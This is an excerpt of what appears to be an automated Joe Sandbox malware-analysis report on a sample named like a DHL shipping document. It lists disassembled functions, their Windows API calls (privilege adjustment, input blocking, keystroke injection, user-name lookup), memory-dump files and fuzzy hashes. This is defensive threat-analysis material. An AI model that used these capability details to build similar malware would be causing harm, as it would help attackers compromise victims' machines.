Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: e7655e66fd4736492f64b3e3ec9c3a78e46042317909c145fcd4df746894f157
Instruction ID: 09230843512a0798b1b74bcb075261470e159451199bf1f538435911b7c8e35a
Opcode Fuzzy Hash: e7655e66fd4736492f64b3e3ec9c3a78e46042317909c145fcd4df746894f157
Instruction Fuzzy Hash: 9241287650021A7BCB249FB9DC49EBB7778EB84314F10466AF915D7280E7709D41CB90

Function 001FD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 001FD28C

Strings

X64, xrefs: 001FD2A8

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: ce6caba0c6e19cc08e2af4a3845ba62af2450b035590facaed04b53aaa5cd0f4
Instruction ID: 8c14c3ed465bc62afc526d4b3b8873187e64da8f83db63c8a16dbb481f8011ad
Opcode Fuzzy Hash: ce6caba0c6e19cc08e2af4a3845ba62af2450b035590facaed04b53aaa5cd0f4
Instruction Fuzzy Hash: 96D0C9B480111DEACB98DB90ECC8DEAB37CBB04305F100151F106A2000DB3095488F10

Function 001CCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 8ab01c4104e374e8732abe44f148626be861888778461f35c9fece5887b7a97b
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 28020B71E002199BDF14CFA9C990BADBBF1EF58314F25816ED819E7384D731AE418B94

Function 001ACAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#', xrefs: 001ACF7F
Variable is not of type 'Object'., xrefs: 001F0C40

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#'
API String ID: 0-4107862598
Opcode ID: 28b1d7fc2ead8c067b2a30f318e759752bee956badc48f2e8bb49f49b864ae94
Instruction ID: 5d0423c620758dc5f7f04d2d5ad405551fe041061ff9fbc6c6e862e93c58ba9c
Opcode Fuzzy Hash: 28b1d7fc2ead8c067b2a30f318e759752bee956badc48f2e8bb49f49b864ae94
Instruction Fuzzy Hash: E432AE78900218DFCF19DF94C985AFDB7B5FF1A304F148059E906AB292DB35AE45CBA0

Function 002168EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00216918
FindClose.KERNEL32(00000000), ref: 00216961

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c865e4cf9101416c94860981b128995e5a04ce8915bcd8b1920f9097a14beaff
Instruction ID: 29e32965a12b6e78be840ffbc4dde07da4fff68eb31308961b9d39e617fcdbe7
Opcode Fuzzy Hash: c865e4cf9101416c94860981b128995e5a04ce8915bcd8b1920f9097a14beaff
Instruction Fuzzy Hash: CC1190356142119FC710DF29D888A1ABBE5FF95328F14C6A9E8698F6A2C730EC45CBD1

Function 002137B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00224891,?,?,00000035,?), ref: 002137E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00224891,?,?,00000035,?), ref: 002137F4

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: d3e4d41bd742b737a6905d8cbd73c47e54409393667d0e4a31cf525b05af10d3
Instruction ID: fe8f5b77c62a95b1afb6f6212dad4d3252ef2565a1828f7eb0c0163313319579
Opcode Fuzzy Hash: d3e4d41bd742b737a6905d8cbd73c47e54409393667d0e4a31cf525b05af10d3
Instruction Fuzzy Hash: 38F0E5B16043292AE72057669C4DFEB7AEEEFC5761F100175F509E22C1DA609D44C7B0

Function 0020B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0020B25D
keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 0020B270

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: e8dabc794b07f400d95b9b72b0ffd4df503dd8dcf165747d008a6118b9137d7f
Instruction ID: f1ca4ca929e68971d904c5c3c73b5ffcf00be3b9ebb0d47979a27b9bf0d7aee4
Opcode Fuzzy Hash: e8dabc794b07f400d95b9b72b0ffd4df503dd8dcf165747d008a6118b9137d7f
Instruction Fuzzy Hash: A2F01D7181434EAFDB159FA0D805BAE7BB4FF04305F108009F955A5192C3798611DF94

Function 002010BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002011FC), ref: 002010D4
CloseHandle.KERNEL32(?,?,002011FC), ref: 002010E9

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: cca4f9e8257fdf45a1f1eacbb975d542fdec2390c7a56777ba676c7e406669cc
Instruction ID: 96f45a5e9f3059a69712f281130f6bff536a53a2fd2b79ea1967b26067de9a85
Opcode Fuzzy Hash: cca4f9e8257fdf45a1f1eacbb975d542fdec2390c7a56777ba676c7e406669cc
Instruction Fuzzy Hash: FEE0BF72018611AEE7252B51FC09EB777E9EB04310B24882DF5A5904B1DB62ACA1DB50

Function 001D676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001D6766,?,?,00000008,?,?,001DFEFE,00000000), ref: 001D6998

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: d780402fa03b9db5b4bff84bf46aefb4f111b376be138f7fe0cfe9541c89c63d
Instruction ID: 17dfaa8ee89cc736d2cb6518c6200ee80428fd247b447a75cc05b1a686371156
Opcode Fuzzy Hash: d780402fa03b9db5b4bff84bf46aefb4f111b376be138f7fe0cfe9541c89c63d
Instruction Fuzzy Hash: 7EB12931610609DFD719CF28C48AB657BA0FF45368F25865AE8D9CF3A2C335E991CB40

Function 001BB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 001F851F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: bc096c4ff300b7d280b341aa890f34ff4d6203cc6158b90da929ca3cbb343c13
Instruction ID: 07c2c1a2b2d024d35c2158c3fbccca0b85ae0178148a3f56a9fc14dbc89ec8d0
Opcode Fuzzy Hash: bc096c4ff300b7d280b341aa890f34ff4d6203cc6158b90da929ca3cbb343c13
Instruction Fuzzy Hash: FF126E759042299BCB24CF58C8806FEB7F5FF48710F1581AAE949EB255DB709E81CF90

Function 0021EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0021EABD

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: a69ee3af3347d0d357ee611bea1a8f192f072e695fdb37208e96cc1259299066
Instruction ID: 5688199cc2c4b53f9a12655738fddc612fda5e0c19db524d22f4695e31491a54
Opcode Fuzzy Hash: a69ee3af3347d0d357ee611bea1a8f192f072e695fdb37208e96cc1259299066
Instruction Fuzzy Hash: 6DE04F362102049FC720EF69E845E9AF7EDAFA9760F018416FC4AD7351DBB0E8808BD1

Function 001C09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001C03EE), ref: 001C09DA

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 231a6301ffc9a097b592d175daba5b9513705fea8af5de6fb81efa8a38c5b0d0
Instruction ID: cff4e9b430a996a62b54c1661a9a5e13093a01701f4dd965141fd223ce89d0f5
Opcode Fuzzy Hash: 231a6301ffc9a097b592d175daba5b9513705fea8af5de6fb81efa8a38c5b0d0
Instruction Fuzzy Hash:

Function 001C781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 001C798B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: ef6d64894bc2e68ca303afb765978a239bb359232d67b0c6ad0270ac6664d0a6
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 2C51887160C7469BDF388568889EFBE63999B32354F18050DEA82D72C2C7E1DE01DF52

Function 00212046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&', xrefs: 00212053

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID: 0&'
API String ID: 0-3187542733
Opcode ID: e520170a088ee08428628f2262ce84f68fae27c04b5400c70983556d47eb7c4d
Instruction ID: 55cd26889d247b606513b2f74948503e7861f460844899b986c83c313ef477a0
Opcode Fuzzy Hash: e520170a088ee08428628f2262ce84f68fae27c04b5400c70983556d47eb7c4d
Instruction Fuzzy Hash: 3321A832620511CBD728CF79C8226BA73E5A764310F15862EE4A7C37D1DE35A948CB80

Function 001D6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd0742b293e993c2f5f566309a13f24aee2cffb100980a77d20e8639443dfe27
Instruction ID: 43265d7dd9c314506295b720e7df95a94cc320638f65fbf10c016ac888defac0
Opcode Fuzzy Hash: cd0742b293e993c2f5f566309a13f24aee2cffb100980a77d20e8639443dfe27
Instruction Fuzzy Hash: 15326726D29F018DD7239635EC26336A249AFB73C5F55C737F81AB5AA6EB28D4C34100

Function 001BCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a48e7c58985221c2fb29e14fe8414674a99bf37538ead51f1beb9167cf6114a
Instruction ID: fb7cdd07ad3e76c96ecba25d71ef3ee9bfa25ad92a7022bb1e5c6a88eeb43c69
Opcode Fuzzy Hash: 8a48e7c58985221c2fb29e14fe8414674a99bf37538ead51f1beb9167cf6114a
Instruction Fuzzy Hash: 91324931A0411D8BCF28CF69C6946BE7BA1EF45354F29856AD65ACB291E330DD81FBC0

Function 001A7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b5cefb9d82044dabed8c98c93412feff2f86d81f0d263919c7cebcf82808d6
Instruction ID: 5e4d272acc933e195ce8b7bc6686c5e259a76d3b1a4a74c809bd60aa4e8f2172
Opcode Fuzzy Hash: 30b5cefb9d82044dabed8c98c93412feff2f86d81f0d263919c7cebcf82808d6
Instruction Fuzzy Hash: 6E22D1B4A00A0ADFDF14CF65C841AAEB3F2FF59304F144529E816A7291EB35DE51CB50

Function 001A91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ad3a23a869b2459a37014ba4256cbd8d4371c2d5e059b186f0e3dd8756156e9
Instruction ID: fb78dcb13bfeef894712a706b7ca6f8d9951c06c1729bd4b660f603ccdb57853
Opcode Fuzzy Hash: 3ad3a23a869b2459a37014ba4256cbd8d4371c2d5e059b186f0e3dd8756156e9
Instruction Fuzzy Hash: 7C02B5B0A00605EBDF04DF65D881AAEB7F1FF54300F218169E816DB291EB71EA61CB91

Function 001C1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 253c9070496d09d604e6dd9b9bf1cdd781039aebd69195dfe741222bf210e8a7
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 169177731480A35ADB2E46798575A7DFFE15A633A131A079DE4F3CA1C2FF20C964D620

Function 001C19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 63950f38320d94c1f47708b3e31c7606d7eba0d1ff6de5c4eaac62648d325873
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: BC9133722490E359DB2D427A8574A3DFEF15AA33A131A079DD4F2CB1C2FF24C965DA20

Function 001C7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0ac624e15013c3b3d0f9260cfa293ec11b91f3cd7d56532e038ff3a177e1e27
Instruction ID: 98f7a75950de008167235ba253dbe6253710505edb227f3333476a1f8eecbf42
Opcode Fuzzy Hash: a0ac624e15013c3b3d0f9260cfa293ec11b91f3cd7d56532e038ff3a177e1e27
Instruction Fuzzy Hash: 74615B71208746A7DB38A9688996FBE2394DF71710F18091EE842DB2C1D7D1DE42CF56

Function 001C7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6404f061e592b13724d7f9a8839f09cdbeb4a614d76f2410370f904b395e0832
Instruction ID: aeae8f6996d3035661b91101a9b129cc793b82599e4fdb93aeb7b4fd6c204f4c
